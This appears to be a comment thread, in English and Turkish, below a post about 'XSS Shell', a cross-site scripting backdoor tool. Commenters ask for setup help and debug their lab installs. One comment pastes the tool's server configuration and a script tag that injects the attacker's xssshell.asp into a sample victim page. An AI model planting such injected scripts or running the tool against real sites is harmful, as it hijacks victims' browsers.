XSS Shell, backdooring the web...

Im guessing that u cant do this remotely?

eLLerinize sağLıkdenemedim ama az sonra bakıcam

Is there any link to english version of this site???

Hey i have got one problem.... I have configured the xssshell well. Everything works fine..
But i am not being able to see the zombies dropping down in my admin interface.. I have replaced the desired url with http://localhost/xssshell/

Is it correct, or do i need to supply other url?? Kindly guide me..
I am not able to get why testing does not drop zombies in admin interface..

I am getting an error when running as the attacker. I am getting it's an IE and I couldn't figure out how to attach an fuction with event succesfully on my attacker page and on my iis server it brings up a debug message. any idea's? I am stuck

Harika biseye benziyor...
Hemen Asp Server kuruyorum:] Gercekten Professional olmus gibi...
kodlar bunu gosteriyor
gorusmek uzere paylasim icin saolun

aga ben bunu kuramadim çalismiyor hep editlerde eksik yada yanlisliklar çikiyor buna turkçe sekilde el atarmisiniz

merhaba usta türkçe olarak daha genis bir kurulum bilgisi vere bilirmisin simdiden tesekkürler

Hocam bunun Türkçe bi dökümanini hazirlar misiniz? xssshell.asp yi açmak istedigimde kodlar direk çikiyor karsima..Asp den de anlamadigim için çaresiz kaliyoruz.Ki çogu arkadas ta yapamamis benim gibi.daha açiklayici bi döküman hazirlayabilir misiniz?

Simdiden tesekkürler!!!

M4D syshole.com da ufak bi döküman yazdim bu konula ilgili basit bi sey oldu ama kullanimi açikliyor biraz..
gerçi sitenin reklamini yapmis gibi oluyor biraz ama nasil olsa ferruh bey yorumlari onaylamadan önce okuyor :)
Eger ufak bi yardim olsun isterseniz yorumlar kismina da direkt yapistirabilirim dökümani...
Bu arada script olaganüstü olmus ferruh bey xss ataklarini yeniden canlandirabilecek tek seydi umarim gelismeler devam eder.

My Virtual Directory "xssshell" points to C:\xssshell

There

\db\sample_victim\xssshellxssshell.asp

My xssshell.asp file has variables

// You XSSShell Server
var SERVER = " http://localhost/xssshell/"; // This file's name
var ME = SERVER + "xssshell.asp?p=1<%=VicAdd%>" ;
// Connector file (can be in php, cfm, pl etc. just stick with implementation)
var CONNECTOR = SERVER + "xssshell/connector.asp";
// Commands file (can be in php, cfm, pl etc. just stick with implementation)
var COMMANDS_URL = SERVER + "xssshell/commands.asp";

My C:\xssshell\xssshell\db.asp value is

'// DATABASE CONFIGURATION
Const DBPATH = "..\db\shell.mdb"

My C:\xssshell\sample_victim\default.asp value is

<script src=" http://localhost/XssShell/xssshell.asp?v=336699"></script>

C:\xssshell\ and all sub directories are not read only

xssshell virtual directory and all sub directories are set to Write in IIS


I can load the admin interface OK, but when I access http://localhost/XssShell/sample_victim/default.asp I get debugger

"An unhandled exception ('Operation must use an updateable query.') occurred in dllhost.exe [900].

in debug, it is failing on "ExeNewRs.Execute" with query INSERT INTO Victim (IP,VictimID) VALUES (127.0.0.1,308307)

I configured XSS Shell correctly.... But I dont seem to get the victims dropping in the Admin Panel. I get a yellow blink that is suppose to mean something... But I see nothing.... Help me please...